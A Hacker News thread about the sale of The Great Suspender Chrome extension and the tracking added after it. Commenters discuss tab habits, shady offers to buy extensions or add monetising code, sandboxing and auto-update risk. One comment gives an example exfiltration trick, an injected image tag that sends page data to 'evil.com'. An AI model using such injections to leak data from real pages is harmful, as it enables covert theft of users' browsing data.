[HN Gopher] I no longer trust The Great Suspender ___________________________________________________________________ I no longer trust The Great Suspender Author : davidfstr Score : 758 points Date : 2021-01-20 14:01 UTC (8 hours ago) (HTM) web link (dafoster.net) (TXT) w3m dump (dafoster.net) | tra3 wrote: | A reddit link, from the blog post [0] has all the details for | those who don't use chrome. | | TLDR: A popular extension was quietly sold off to an unknown | party that subsequently added tracking/analytics. Not | specifically malware, but not trustworthy either. | | Did I miss anything? | | [0]: | https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou... | peanut_worm wrote: | Why do people keep 100s of tabs open at a time? I get irritated | if I have more than 8 open. | eznzt wrote: | Because they have not found the bookmarks feature yet. | ortusdux wrote: | When I have 100 tabs open, 90 of them are one time use pages. | I need to compile bits of information from each page, and | then I never need those pages again. Why would I use | bookmarks? | | For example, last week I was shopping for a very specific, | very expensive ceramic thrust bearing. I had 20+ pages open | from 10+ suppliers and documentation sources. I needed those | open all week while we decided on which one to buy. This was | a minor background task, so I also had 60 other tabs open for | my normal work flow. | | Just because people use a tool differently than you doesn't | make them wrong. | gmiller123456 wrote: | It'd be great if someone invented a method of working with | bookmarks that worked as easily and seamlessly as tabs. | | Back in the days of social bookmarks (like del.icio.us) | pretty much everyone had a "toread" folder. The main problem | is that you have to remember to delete them after reading | them. That's not really a problem for good articles you | remember reading, but the crap articles you don't remember, | or quit reading are easy to forget to delete from the | bookmarks. So, you end up reading the same crap articles | several times. With a tab, you close the window and you're | done. With bookmarks, you have to close the window, go | through your bookmarks, find the one that was crap that you | have already forgotten and delete it. | | There's several other advantages to tabs too: | | Like the fact that they're naturally organized by window | based on the task you're doing. | | You'll see them more often, and thus be reminded more often. | | They save context, like forwards and back history, and | information you may have typed in, or a UI you may have | manipulated. | edeion wrote: | That brings me to the problem with links as well as with | e-books: you don't usually see them. When you have an open | tab, you see it all day long until you get rid of it. When | you have a printed book, you bump in it on a daily basis | (unless you hide it in more books). | hungryforcodes wrote: | Also bookmarks don't save page context. If I'm doing | something -- even something simple like scrolling down a | page -- and get interrupted, it's just easier to leave it | open. | superkuh wrote: | Yep. Tab history is important. How I got to some page is | almost as important as the page itself. | | I've been using large tab sessions ever since Opera 5 in | the early 2000s. Back then I'd have 20-50 tabs or so. | These days I have sessions of 500 active tabs and 500 | suspended. It's great. I have full text tab search, and | since my sessions last years, I know the general location | of all important tabs. ALso, since I use a single process | brower and NoScript, all those 500+ tabs take under <3 GB | of ram. | | It's matter of taste, but it's no new trend. Tabs, and | tab users, have been around for 20 years now. | jrockway wrote: | https://xkcd.com/1172/ | sixothree wrote: | Why do people not understand why I have 100s of tabs open? I | get irritated when asked this question. | nousermane wrote: | Why indeed. Is that because bookmarks are too clumsy to use, | and don't save your scroll position and other user input? | redwall_hp wrote: | Any time I'm working on something, I inevitably end up with | 20-30 tabs with different things I'm referencing. | Especially documentation. I think I have around 6-8 open | when I'm not doing anything, since I pin some web apps | (e.g. Facebook Messenger) or dashboards. | | It's also the best way to browse image galleries: middle | click everything into new tabs, navigate them with the | keyboard, and close them as you go. Beats clunky JavaScript | lightboxes. | blinding-streak wrote: | Tabs are my lazy man's to-do list. Leaving them open saves all | the context I need. Closing them means I have to spend effort | to get them back. | ortusdux wrote: | Try the extension 'Session Buddy'. You can view all open tabs | and windows, group them as needed, and then save, close, and | reopen sessions and groups. | | I routinely research several related topics for a project, and | I will need 10-30 tabs per topic open at once. Surprisingly, | chrome manages to handle 100+ tabs on my system with out issue. | angelbar wrote: | Please dont have more than 8 tabs open... problem solved. | | Other persons have other treshold... and use cases. | | Some user support need many searches that will help if be | documented later... if I bookmark all of them I will never do | that. | rbanffy wrote: | I multitask. A lot. It's my job. | | You should see my desktop | dbbk wrote: | I'm a software developer and am always hovering around this | mark. It's usually from digging through documentation, having | multiple tabs with different areas of the app you're working on | open, productivity tabs like Slack and Gmail, then personal | tabs like Reddit and YouTube | fancy_pantser wrote: | As the developer of a pretty popular "utility" browser extension, | I've been shocked by the volume of email I get every week about | it. | | On a daily basis, I will get requests to sell the extension. Once | or twice a week, I will receive an offer to add "a couple lines | of code" to my extension which are always generously described as | "allowed in the Chrome Web Store" by little fly-by-night | organizations that only even have a landing page half the time | and usually have throwaway-looking gmail accounts. Out of | curiosity, I've asked a few what their code does and they never | fully describe it, but it either collects analytics to ship home | (my extension runs on all sites, so it's appetizing to them!) or | places paid results at the top of any search results, for which I | can make "thousands of dollars a month based on the number of | North American users I have". | | Here is an example email I received yesterday. It's a good | example of how they call it "an SDK" and looks like one of the | more legit ones (they registered a domain to send email from, at | least). We at [redacted] are considering | purchasing the complete license and ownership of the extensions | which have 50K+ active users, may I know if you would be | interested in selling? If so, - what is your estimated price? | Regarding the SDK monetization which we discussed earlier, as it | is not distractive and is compatible with any other monetization. | We have straightforward terms and provide support for your users | agreement. Our partners generate 3-20 K USD monthly with our | solution for the browser extensions. As a kind | reminder, we are [redacted] -- a reputable global peer-to-peer | ethical proxy network. All our clients are big reputable | companies, we authorize their business before providing any proxy | plans. Look forward to your further feedback and | discussing further details of our financial proposal for your | Software in a short Zoom call or here by emails. | | Finally, I am also hounded by teams at Microsoft and Apple, who | want me to port the extension to their new plugin ecosystems so | it can be featured/showcased. I worked with Apple on one similar | thing for an extension and it caused such a huge jump in support | and feature requests from users that I was overwhelmed, so I am | not keen to do it again until I have more free time. They can't | understand why I don't want to grow by tens of thousands of users | a week, but I'm just one person and don't make money from it | whatsoever. | teachtyler wrote: | Is this any different than Railway Programming? Or is this more | specifically applicable to high order components? | | https://fsharpforfunandprofit.com/rop/ | LockAndLol wrote: | > Finally, I am also hounded by teams at Microsoft and Apple, | who want me to port the extension to their new plugin | ecosystems so it can be featured/showcased. | | Do they ask you to do that for free or is there a monetary | amount they tack on? | reaperducer wrote: | I have two thoughts about this. | | First, respond to every inquiry by telling them the price is | USD$70,000,000.00. And stick to that price. Many of these | sleazy companies get their leads from the same "lead | generators," who will eventually take you off their lists | because they know your terms are unreasonable. It doesn't work | for everyone, but when I did it to spammers trying to buy my | mailing list, it significantly reduced the volume of inquiries. | | Second, put a page on your web site listing all of the | offending companies, with links to the letter you received. | | Apr 1, 2021 - Company X promised $3-5k/month if I alter your | search results. Link. | | Apr 3, 2021 - Company Y promised $1-5k/month if I promote thier | product on other people's web pages. Link. | | A lot of people on HN will claim "O, noes! Lawyers! Libel!" I | wouldn't worry about it. These people don't have the money for | lawyers, are usually in geographies without legal systems, and | don't want their names and other information exposed in a | public legal filing. Plus, all you're doing is stating facts. | hinkley wrote: | > by telling them the price is USD$70,000,000.00 | | There's a W C Fields joke that ends, "Madame, we've already | established what sort of woman you are, now we're just | haggling over price." | bluGill wrote: | Every time they make a lower offer counter with a higher | price. They will soon learn what kind of person they are | dealing with. | | If they actually do come up with $120,000,000 - will at | that point nobody will be surprised that you cashed out. | They might be mad, but they won't blame you. | AnIdiotOnTheNet wrote: | Case in point: Notch once said that his price for selling | out Minecraft was $2B. When Microsoft eventually said | "sounds fair" and gave it to him very few people found it | easy to be mad at him. | cbhl wrote: | I wonder what the calculus was on the Microsoft side of | the equation. | | "It'd take more than 10-SWE-years to build a clone, so we | should take his offer"? | StellarTabi wrote: | They rewrote anyways. | mywittyname wrote: | They are paying for the brand, not the product. Microsoft | is ensuring that they have mindshare in the next | generation of gamers. That's critically important to | maintaining their ongoing success in the gaming sector. | | Similar to why Disney paid billions for Star Wars: the | company was easily capable of replicating the product; | the issue was replicating the brand. That brand has a | proven track record of multi-generational appeal. | ljm wrote: | I think it's more than just the brand right? I can't | speak for Disney and Star Wars because Star Wars was | never my thing. | | These creative endeavours have a soul, or an essence, for | want of a better term. You can replicate a game or a | movie and it will feel utterly soulless compared to the | original, even if you can't visibly notice a difference. | | You could reproduce Minecraft but even the most | infinitesimal divergence from the original will make it | feel fake. Maybe the controls have a different 'feel', or | the way the scene is rendered feels a bit off. It's just | not Minecraft any more. There are just so many quirks and | details that will be lost in the translation, or even | patched over if they're seen as bugs. | | It's no different if you ported a game from Unity to | Unreal and then to CryEngine. I'm sure that with a blind | comparison you would be able to 'feel' the difference. | | And the same for films. The way these things were created | has a lot of influence over the end result. | | On the other hand, it's exactly what can make a remake or | remaster so successful. The Resident Evil 2 and 3 remakes | that followed Resi 7 were phenomenal! Not totally | faithful to the originals, didn't try to be...they just | took an older game and gave it a new life. | citizenkeen wrote: | I think you've just described a brand. | | People don't go to Starbucks because it's the best, they | go to Starbucks because mocha frappucinos in Lima and | London taste exactly the same. Any divergence, even an | infinitesimal one, makes the frap feel fake. | brownbat wrote: | Reminds me of the quests to recreate the secret recipe | for Coca-cola. | | The secret ingredient isn't orange peel, it's $4 billion | a year in marketing. | TedDoesntTalk wrote: | You could recreate the brand and the product, and you | still won't have millions of users playing it. They | bought the user base, too. | wpietri wrote: | A brand is not just trade dress. It's a relationship | between a company and the public. Recreating the brand | means building those relationships. | slongfield wrote: | To be fair, people found plenty of other things to be mad | at Notch about. | drewwwwww wrote: | that was not what people got mad at notch about | newnamenewface wrote: | People got mad at Notch for internet-age old reasons: | expecting someone with high technical skills in one | domain to have the right takes on social and political | issues because they're now a internet social presence in | addition to whatever creative work they've done. If | people were realistic in their expectations of Notch, | they'd never have been mad in the first place because | they wouldn't have cared what inane ideas he spouted. | grecy wrote: | My buddy loves buying and selling stuff from the local | newspaper. Whenever people give a low ball offer he looks | them directly in the face and in a very confident manner | says: "I'm accepting asking price or anything higher!" | | The looks on people's faces are incredible. | madeofpalk wrote: | I have no problem being "that sort of women" for | USD$70,000,000.00, over a browser extension. | Dylan16807 wrote: | There's a big difference between retirement money and day- | job money, which applies both to this and the joke. | mcjiggerlog wrote: | I also have some extensions with users in the tens of thousands | and can corroborate all of this. Out of curiosity I strung one | "buyer" along to see how much they would offer and they quoted | $0.20 per user. With the amount of money being thrown about, as | sad as it is, it's no surprise that some devs end up selling | out their users. | | In my opinion extensions have to be one of the worst sources of | spyware these days. I am now extremely conservative with what | extensions I use, and definitely would only use extensions from | open source projects or companies that I trust. | | Something needs to change. As long as extensions have such weak | sandboxing along with such poor app review, Google/Mozilla etc | will keep willingly shipping spyware unbeknownst to their | users. | | At least some mechanism of creating and verifying reproducible | builds would go a long way. | Someone wrote: | If you can make thousands a month on tens of thousands of | users, that's (very much ballpark) $0.10 per user per month. | | Paying $0.20 per user to buy that seems extremely low. | | Also, on the sandboxing/app review of extensions, does | anybody know how well Apple vets Safari extensions? (I guess | that could be hard if the evil parts are time-triggered, | certainly if the code also is obfuscated (possibly in the | name of minification) | SamBam wrote: | Who said they were earning thousands a month for their | extension? | wffurr wrote: | If the malware seller can make $0.10 / user / month, then | paying the extension developer a one-time fee of $0.20 * | users is only three months to pay back. Thus considered a | low price for the extension developer but still | attractive to the extension developer who likely earns $0 | / user from their extension. | koheripbal wrote: | The only extensions I have are privacy extensions. Do people | on here really install a bunch of random 3rd party | extensions? | Scoundreller wrote: | Privacy extensions can be crap too. Cutting off web-based | analytics makes the telemetry from those users much _more_ | valuable. | | Ghostery anyone? | | https://www.reddit.com/r/privacy/comments/59wiln/is_ghoster | y... | marcus_holmes wrote: | probably not on here no. But out there... definitely yes. | rsync wrote: | "In my opinion extensions have to be one of the worst sources | of spyware these days. I am now extremely conservative with | what extensions I use, and definitely would only use | extensions from open source projects or companies that I | trust." | | I completely agree. There are a number of features I would | really like to use in Firefox that are available only as | extensions and I continue to resist installing them. | | In fact, the only extension I use is uBlock origin - which is | based on a fairly rich social and community history behind | that project and its author ... | TedDoesntTalk wrote: | Stick to the Firefox Recommended Addons list. Those are the | only ones which are code reviewed by real people. | | And uBlock Origin is in that list. | marcus_holmes wrote: | Also, a business model for extensions would be good - even if | it's just an official "tip box" that enthusiastic users can | pay into | milankragujevic wrote: | Is this Luminati? [0] Because this sounds so much like Luminati | ("Hola"). | | [0] https://luminati.io/ | nitrogen wrote: | Do extensions require any permissions to make requests? It | seems like a strict sandbox that prevents data from flowing out | of a page via an extension would help, if the extension is | something like a JSON renderer. | londons_explore wrote: | Most extensions need the ability to modify webpages. With | that ability, they can easily exfiltrate data by for example | adding a <img src=evil.com/?data=82374682376>. | | Trying to sandbox an extension that can modify arbitrary | webpages in arbitrary ways is near futile. | angry_octet wrote: | Couldn't CSP be used to limit which paths were valid URLs? | | There could also be hierarchies of extension permissions, | because they don't all need to be able to do everything. | gruez wrote: | extensions can also remove/add CSPs I think, either | through modifying the header or modifying the DOM. | angry_octet wrote: | Yes, but you could strictly limit which extensions had | that permission, make it a site specific permission, etc. | Auto disabling an extension that changes to require that | permission would be a start. | nitrogen wrote: | _Trying to sandbox an extension that can modify arbitrary | webpages in arbitrary ways is near futile._ | | Just don't let them create _script_ elements, or add any | URLs that don 't come from within the extension bundle | itself. Browsers already have to do a ton of bookkeeping to | track the origins of requests anyway. Doesn't seem hard, | you just have to be thorough. | londons_explore wrote: | There would be ways to trick the original page into | adding stuff for you. | | For example, you could patch some of the original script | of the page and wait for it to be run. | Dylan16807 wrote: | Restricting the extension to pre-baked URLs means it | takes several page loads to exfiltrate something, but | doesn't stop it. | MetalGuru wrote: | Crazy. Can I ask what extension this is? Wish I had the problem | of tens of thousands of new users wanting my product weekly :) | wlesieutre wrote: | Per an older comment, it's for pulling recipes off of awful | recipe blogs. Having stumbled into recipe blogs before, the | demand is understandable! | | https://chrome.google.com/webstore/detail/recipe- | filter/ahlc... | nonbirithm wrote: | I find it so ironic they'd buy out am extension | specifically designed to defeat SEO blogspam, just to | insert analytics based monetization instead. | Syntaf wrote: | Going one step further, I found AnyList[1] on this forum | awhile back and they also have a similar extension for | extracting recipes from awful blogging sites. | | The added benefit with AnyList is that you can import | ingredients directly into your grocery list from the | extension. Been a huge time saver for me | | [1] https://www.anylist.com/ | joshstrange wrote: | Paprika [0] can also parse any blog/recipe site and | import the recipe. Then you can add items from recipes to | your shopping list. I highly recommend this app, I've | converted many friends over to it. It's a much better | experience than trying to scroll through a blog post | while cooking. | | [0] https://www.paprikaapp.com/ | wpietri wrote: | Paprika is so good! There are a bunch of fit-and-finish | details that tell me that it's being made by people who | use it and who really care about listening to users. | beepboop43 wrote: | I'll add that I recently found how well Paprika handles | printing recipes you have in your library. I wanted to | print off a bunch of recipes to put in a binder and was | very happy with how clean and simply formatted each | recipe was, often with room to write notes on the paper. | My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | zerd wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | I thought that was the paid Cloud Sync feature was for. | Does it not work for that? | djrogers wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | My wife and I work around that by simply using the same | paprika account for cloud sync... | | Paprika is a huge time and sanity saver for me - it'd be | totally possible, but much harder for me to cook for big | events without it! | wlesieutre wrote: | I love Paprika, my one complaint about it is that you | have to be careful with the ingredients multiplier | feature. It only touches the number at the start, so "1 | large onion thinly sliced, about 2 cups" turns into "2 | large onion thinly sliced, about 2 cups." | | If you're not paying attention you can miss that it | really needs 4 cups. | joshstrange wrote: | Agreed, I've run into the same issue. I had hoped that | the numbers row they show above the keyboard (on mobile) | meant they were "special numbers" that would scale but | alas it only scales the first number AFAICT. | joshstrange wrote: | > My only wish is they would implement a "family" option | where I could easily share my library of recipes with my | girlfriend without having to share them one at a time. | | I normally abhor "social" features being tacked on when | they aren't useful but I'd pay for all the apps over | again for this feature. Thankfully the API is pretty | straightforward. This repo of mine [0] is super dated but | it was still working the last time I played with | Paprika's API. | | I've toyed around with setting up a little web app that | my friends can log-in with their paprika creds (I know, I | know, but I'd tell them to use a 1-off password for this) | so that they can use the web app either push or pull | recipes from each other. | | Thankfully you can send the full paprikarecipe file via | email and import it but it's a little clunky and things | like Discord (which my friends use to chat) doesn't like | file extensions over 12 characters (IIRC) so it just cuts | off the rest of the extension characters leaving you with | a file you can't open (without fixing the extension). I | have some initial work to setup an AWS SES address that | people can send recipes to that will then drop a preview | and link to download (not an attachment, it would be | hosted on S3) the recipe into a "recipes" Discord channel | we use but it's still a WIP. | | [0] https://github.com/joshstrange/paprika-api | [deleted] | hosteur wrote: | What is your extension called? | fancy_pantser wrote: | Recipe Filter: | https://chrome.google.com/webstore/detail/recipe- | filter/ahlc... | criddell wrote: | Why redact? I'm curious about who is doing this. | rsync wrote: | Agreed. These people need to be named and shamed. | boomboomsubban wrote: | It'd be annoying for the poster if they got mad, with an | unlikely but potential legal encounter involved, and 99.9% | of the community will never interact with the company. Even | the few that do would likely realize their scummy business | strategy immediately. Not worth it here. | jrochkind1 wrote: | With that kind of money being offered (assuming it is in the | ballpark of true)... I wonder how many popular free extensions | already have some of that junk in it and nobody's noticed. | Maybe many of them? I could see a lot of devs who started out | writing an extension as a non-paying hobby, having trouble | turning down the free money. | | I feel like this is another prong in the story about threats to | sustainability of open source done the way it used to/has been | done previously. | ryanlol wrote: | > assuming it is in the ballpark of true | | It is. It's very easy to generate big money with ad | replacement or proxies. | greenshackle2 wrote: | Some years ago I applied at a "data analytics" startup | founded by a locally famous founder. Their official purpose | was something something search something social media. Not | in the US, but he was featured on our local version of | Shark Tank at some point. | | During interview it became clear that their "product" was | actually bundled malware that replaced google's and other | ads in the browser. Evidently hot founder guy was using | this startup as cash cow for his other ventures. | | There was some noise in the press about it a couple years | later and founder guy defended himself saying he sold the | company and wasn't responsible, except it was already | malware when I interviewed and he was still owner so I know | it's bullshit. | JeanSebTr wrote: | He is well known for that in the local startup crowd ;) | tornato7 wrote: | And it's something I'm surprised Google hasn't done more to | stop considering these people are basically stealing their | revenue in their own browser | ugh123 wrote: | Ask Apple or Microsoft for a full time job to work on it =) | l3s2d wrote: | Did Apple compensate you for your work porting your extension? | fancy_pantser wrote: | No, but Apple and MS both consider the increased visibility | and growth in user count from being "featured" in their | marketplaces as a nice bonus for the developer. If I were a | business generating revenue from app subscriptions, I'd jump | all over it. | thwarted wrote: | "We can't pay you, but you'll get exposure" | sokoloff wrote: | Said every ad platform ever. | haukilup wrote: | For a couple projects and apps I worked on, exposure in | one of these stores would be worth a decent amount of | engineering effort. You can convert that exposure into | users, marketing "buzz", validation of the apps worth to | third parties, etc. | | This isn't universal, of course. But not all payment | comes in liquid form! | redwall_hp wrote: | And in Apple's case, you can pay $99/year for the | exposure... | [deleted] | noizejoy wrote: | > "We can't pay you, but you'll get exposure" | | ... said the venue owner to the musician. | | It's a frighteningly common invit^H^H^H^H^H^H | exploitation providing free labour to owners of gathering | places benefitting from that labour (like bars and | browsers and operating systems and social networks, etc). | kazinator wrote: | Why should the venue owner pay the musician? | | It's not an iron-clad given that the musician provides | value to a venue. | | Musicians who are confident they can bring business to a | venue negotiate with confidence and get paid. | | Those who play for free are ones who don't have that | confidence. | | What you accept is what you cost. That's the market rate. | | How about this argument. Say I have a restaurant. | Typically that means there is some landlord, and I pay | them utilities and rent in exchange for using the space. | Now some guitar-strumming, crooning ape wants to perform | in the same space. If he and I are to be considered part | of the same organization, we are on the same level of the | "org chart". We are sharing the space and doing our | thing. Why would I pay him anything? He should pay part | of the rent and utilities. Or, why not the other way | around? | | Let's reverse it. Suppose a musician has a venue where he | performs every night, and people come. Paying people. | Suppose I want sell hot-dogs and sandwiches there, and he | lets me do that. Why the fuck should he also pay me | anything? He would be right to ask me to pay some sort of | rent. | | Now if I give the hot dogs and sandwiches for free, so | that many more people come, and those people pay to get | into this music venue, then there is a case that I'm | increasing the business, and doing it out of my pocket. | Still, that is my problem; I shouldn't be doing such a | thing. Maybe I know what I'm doing! Or maybe I'm trying | out new product to see how people like it or whatever | (market research). | worik wrote: | " Why should the venue owner pay the musician?" | | Because a music venue without musicians insn't | sokoloff wrote: | But a dive bar is a still a dive bar and a casual | restaurant still a restaurant... | [deleted] | kazinator wrote: | A dive bar is still a place where people pay for drinks, | and not for music. | | The "open mic" is on Tuesday nights, because nobody goes | there then, so there is no harm to the business, and the | people who come to have open mic fun might buy drinks. | kazinator wrote: | No, it isn't a music venue without musicians. | | But the implied flow of money doesn't follow from that. | | Suppose I own an empty space with a little stage, a PA | sound system, and some 100 chairs. I put a down payment | on this place, paid for equipment and upgrades and have | to pay property taxes, utilities and mortgage. If nothing | happens there, I lose money out of my own pocket. I | intend for it to be a music venue. I meet the definition | of a music venue owner. | | Some musicians have contacted me and would like to have a | concert there. | | Should anyone pay anyone? Who should pay whom? | | How is this for logic: "A house isn't a home without a | family! If you want me to move into this house with my | wife and three kids to make it a home, you're gonna have | to pay me!" | bluGill wrote: | If you are generating revenue exposure can be very | useful. However if you don't already have a good business | model it just digs your hole deeper. Be very careful to | be sure which you are in. | EGreg wrote: | Thank you for sharing this, fancy_pantser. Are you the current | maintainer also, or the current developer? | | This is what capitalism looks like, folks. Someone "built it" | so they now privately "own it", no matter how big it gets. It's | not put into the hands of an organization. The profit motive is | quite strong, which is why someone can be "corrupted" by very | tempting messages like this. If you had a lake or a forest | privately owned by one or two people, and they had a lot of | debts, they could easily sell it to polluters and loggers. | | Some people scoff and say "socialism has been tried, it never | works." I admit that socialism simply trades one class of | elites (the capitalists with a lot of shares) for another (the | bureaucrats with a lot of political clout). BUT! I would like | to say that _socialism is not the only alternative_. The other | alternative is _decentralized systems with no private | ownership_. I 'm talking about science, open source software, | and so on. There can be a Merkle tree of version updates (e.g. | git version control) and each one can have various reputable | organizations (like Zagat for software) building their | reputation vetting it. Then, each community would run their own | app store (think Wordpress plugins) which would work with these | reputable organizations. There would be no heroes, no | celebrities, no tweets at 3 am to 5 million people, no pulling | from repos without peer review, no scientists instantly | believed after publishing on arxiv.org . | | Congratulations for building a popular extension, | fancy_pantser. You live in a world where you it's really bad to | "criticize the profit", and where building it means you are | responsible for it no matter how big it gets, but then we are | all depending on your integrity and ability to rebuff life- | changing amounts of money to _not_ mine our data. We can pass | laws to punish people after the fact, or we can gradually | change our culture by rejecting "immediate gratification" of | updates that are not vetted, just as corporations have done | with bleeding edge vs stable Linux distros etc. Unfortunately, | the Web has made it so that anything can be updated at any | time, with no sysadmins or reviewers in the loop. It's a wonder | more malware isn't silently everywhere already. | throwawa66 wrote: | It's incredible how much downvotes you got for this without | any explanation. Your proposal sounds sensible and I agree | that we need to find a new system. It doesn't have to be this | that you described but we should be open to change. | Capitalism the way it is leads us in the wrong direction and | socialism doesn't fare too much better in practice. We need | to redraw a plan for the 21st century | Qwertious wrote: | If I were to guess, it's down voted because when SKIMMED, | it sounds like an off-topic, far too long, and overly | political comment. | | It's a fair comment, but only if you actually read it. | vinay_ys wrote: | https://news.ycombinator.com/newsguidelines.html might be | the reason why a lot of things here got downvoted. | Specifically: | | Please don't use Hacker News for political or ideological | battle. It tramples curiosity. | bjoli wrote: | Discouraging political discussions is a very political | thing in itself. The comment we are discussing might not | be a great example of encouraging curiosity, but being | the person that says "don't be so political" is | complacent and ignorant. We arrived at the current | situation due to political decisions and a political | process. | | I am not accusing you of being that person, not anyone | else. I am just tired of people not seeing that upholding | the current situation is as political as criticizing it. | This discussion made me try to put it in words. | pksebben wrote: | this doesn't read like a battle, though. one could argue | that opinions that run counter to the generally accepted | norm are inherently good for curiosity. | EGreg wrote: | It is indeed incredible. As I said, you cannot "criticize | the profit" in the USA without losing social standing. | Capitalism is a national religion because people think the | only alternative is socialism (collective ownership of the | means of production - which btw isn't scary on small | levels) and the USA fought a cold war with USSR for | decades. | | That's why there will be a third party in the USA that | unites disaffected progressives on the left with | disaffected paleoconservatives on the right. A lot of | people are fed up with the divisions. | | I welcome counterpoints and debate but as you can see -- | there are just silent downvotes instead | isoskeles wrote: | You're probably being downvoted because even if your | critique might be thoughtful at some parts, it is also | quite snarky and smarmy at the beginning, and sounds like | it's posing an ideological battle. Starting at the third | sentence, _" This is what capitalism looks like, folks."_ | In fact, you're still doing it, _" Capitalism is a | national religion..."_ | | Do you think people on HN want to engage with your | comments when you're saying they're foolishly clinging to | a religious belief? | | By the way, this was a decent point: _" [W]e are all | depending on your integrity and ability to rebuff life- | changing amounts of money to not mine our data."_ Maybe | this thread would be different if you stayed with points | like that instead of accusing people of harboring | religious beliefs that pulls the wool over our eyes, | preventing us from seeing things your way. | filleduchaos wrote: | > Do you think people on HN want to engage with your | comments when you're saying they're foolishly clinging to | a religious belief? | | To be fair _you_ inserted "foolishly clinging", and are | now blaming them for something they did not actually | say.' | | Capitalism _is_ highly akin to religion - they 're not | the first and will not be the last to draw that | comparison, and plenty of words have already been written | on the topic. If your response to reading "capitalism is | a national religion" is to assume you're being insulted, | perhaps consider that the statement may be more true than | you think. | worik wrote: | Off topic, but.... | | There is unlikely to be a third party in USA as the | system is designed to have two parties. | | There may be a third party that forces the Dems and GoP | to unite, back to two... | richardwhiuk wrote: | > decentralized systems with no private ownership | | aka anarchy. that turns out to be worse. | worik wrote: | What is your evidence? | | Mackknovist Ukraine, Spanish Republic, and Zapitista | country now... | | All were/are quite different. Worse than what? | EGreg wrote: | Anarchy is simply absence of tall hierarchies. | | You can have each individual community choose what | OpenStreetMap tiles to use, what to censor etc. | | Like HN does. What if HN was kicked off a host? They would | put the backups somewhere else and repoint the DNS. | | What if ICE seized their domain? Then we could move domain | name resolution to a DHT. | | What if AT&T refused to carry it or charge extra? The | signal could route packets along other lines. No single | point of failure. | | It's not just about banning 0% or 100% but the prices and | friction imposed by privately owned rentseeking | infrastructure monopolies. Why in a span of less than 10 | years, VOIP has caused international calls that used to | cost $3 a minute to turn free and have video! | | The weird thing is that when A wants to connect woth B you | think there has to be a one-size-fits all C that can block | it. | worik wrote: | "Anarchy is simply absence of tall hierarchies" | | No it is not! | ohgodplsno wrote: | Ah, yes, the little project known as Debian completely | failed and never took off. Anarchy is so bad. How could it | ever produce anything of value, like say the world's most | used linux distribution? | andrepd wrote: | Yes, as we all know, open source software is a failed | experiment, a cesspit of "anarchy". | vlovich123 wrote: | Not open source. Open source is a resounding success. The | marketplace with the problems is advertising. We need to | enact laws banning selling of third party data and make | leaks a liability (perhaps even one that automatically | pierces the normal corporate veil and opens VPs and up to | personal liability if there was any circumvention | initiated encouraged by them). Then businesses have to | actually decide if the liability is worth it for them vs | a free-for-all market that intelligence agencies and | criminal enterprises are primarily funding. | EGreg wrote: | As well as science, language and other human endeavors. | No one is in charge! I'm glad society advanced so much | from secret alchemy cults with their "intellectual | property" protections on their secrets. | mixmastamyk wrote: | That's a good description. A successful cesspit of | anarchy. | jbman223 wrote: | Most open source software is neither decentralized nor | publicly owned. | TuringTest wrote: | All of it is, otherwise it wouldn't meet the 4 freedoms | that define open source. | | The 'project' maintaining the software may be | centralized, but all its users "own" the software in the | sense that the don't need to ask permission to the | maintainer, and they can create their own modifications. | hojjat12000 wrote: | You're mixing a few different things. Free software and | open source are different. and for each of them there are | hundreds of different licenses that allows you to do | something but not another. | TuringTest wrote: | Free software and open source are _different marketing | strategies_ for the same concept. The most commonly | understood meaning for both terms is the same, from the | very moment the Open Source Initiative was created. | gmiller123456 wrote: | It seems you've misinterpreted the poster's intentions as if | it should be illegal for a developer to do this. But he/she | was merely informing users, and well informed customers is a | requirement for capitalism to work. | | The cost of using this extension is your information, and | there are other products available that do the same thing at | a lower cost. Based on the most fundamental concept of | economics (supply and demand), "The Great Suspender" should | fail as a product very quickly. | djrogers wrote: | > so I am not keen to do it again until I have more free time | | Aww man, I'm really sad to here that RecipeFilter won't be | coming to Safari anytime soon. I really got my hopes up after | it was in the keynote! | | Since Apple distributes extensions in the App Store, have you | though about charging a buck or two for the Safari version? I | know everyone says this, but I'd pay... | kazinator wrote: | > _what is your estimated price?_ | | Say, $5 per active user; non-exclusive license: I can maintain | my fork of the extension, and use any of the code in new | projects. | bombcar wrote: | I feel there's a moneymaker here - create a popular open source | extension, sell it off when you get a good deal, fork the code | and let everyone find out the old version is "evil". | twunde wrote: | For those interested in understanding the security of Chrome | extensions, duo introduced CRXcavator (https://crxcavator.io/) a | while back, which does some risk scoring around permissions. It | is chrome-only, and it doesn't protect against this type of | attack specifically, although you can look at the Potential | External Communication section for possible issues. | mkj wrote: | It seems auto-updating browser extensions are riskier than | leaving them non-updated? | netsharc wrote: | It'll be a "great" day when someone manages to do big damage | with code that Google hosted and delivered to the victims... | IMO it's just a matter of time. | SiteRelEnby wrote: | Blindly letting _anything_ auto-update. | AQXt wrote: | ...which happens all the time in the free software world, | when you type `apt-get|yum|brew update`. | | What are the odds of one dependency being taken over by a | shady anonymous entity? | mad182 wrote: | Packages in the default repos for some large Linux distro | are usually reviewed and tested by many people until they | make it into updates for current stable version, so while | it's probably not entirely impossible for some malicious | code to get in, it seems pretty unlikely. Unlike browser | extensions, where the current owner can upload anything | they want and it's pushed to the users without them even | knowing. | AQXt wrote: | How about `npm`, `pip`, `cpan`?... | | We have seen bad updates breaking the entire Javascript | ecosystem, but they were not intentional. | | All it takes to inject a bad dependency is a burned out | developer willing to delegate his free project to someone | else... | SiteRelEnby wrote: | It's more the chance of an unexpected breaking change. When | you use a package manager, you're _expecting_ stuff to | change (and get to review what 's changing). | | Upgrading manually regularly: Good idea. | | Having a cronjob to do it automatically without user | intervention: Bad idea. | Snarwin wrote: | The fact that you have to manually type in `apt-get update` | (or similar) means it's not automatic. You have full | control over when the update takes place, and which | packages get updated. | spiffytech wrote: | When discussing software updates, I feel like folks on HN | commonly overestimate how much impact opportunity for | controlling updates has. I haven't seen someone in my | social/professional circles ever hesitate before applying | an apt-get update. Nobody I've known checks changelogs | (except developers checking on direct dependencies), | nobody reads the patches for the updates to verify | nothing malicious slipped in. "There's an update, I'd | better apply it, unless it smells like a breaking | change." | | So in practical terms, my experience is that vanishingly | few people will behave differently than an auto-update | system would behave, except in rare occasions like a | malicious update making the headlines. We definitely need | a solution for rejecting malicious updates, but I feel | backing away from auto updates throws the baby out with | the bathwater and would be a net-negative change for the | industry and for users. | 